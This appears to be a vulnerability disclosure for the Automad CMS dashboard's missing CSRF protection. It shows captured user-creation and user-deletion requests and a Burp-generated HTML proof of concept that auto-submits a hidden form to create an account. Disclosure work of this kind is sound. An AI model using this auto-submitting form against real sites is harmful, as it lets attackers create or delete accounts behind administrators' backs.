After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks.
This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green
username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rdCSRF HTML:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>Delete Users:
POST /dashboard?controller=UserCollection::edit HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green
delete%5B%5D=User
